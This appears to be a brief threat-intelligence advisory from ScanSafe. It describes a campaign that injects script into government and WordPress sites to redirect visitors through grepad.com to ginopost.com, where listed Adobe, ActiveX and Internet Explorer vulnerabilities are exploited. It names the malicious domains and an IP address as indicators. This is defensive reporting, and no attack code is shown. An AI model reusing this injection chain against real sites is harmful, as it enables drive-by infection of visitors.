ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com which attempts to exploit a series of vulnerabilities. Observed exploits include:

• Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
• Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
• Office OCX OpenWebFile    (BID-33243)
• Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
• Hummingbird PerformUpdateAsync    (CVE-2008-4728)
• Peachtree ExecutePreferredApplication (CVE-2008-4699)
• C6 Messenger propDownloadUrl (CVE-2008-2551)
• Internet Explorer memory corruption (MS09-002)

The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com  and networkads.net.

Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks have also been targeted against WordPress-published sites hosted by GoDaddy.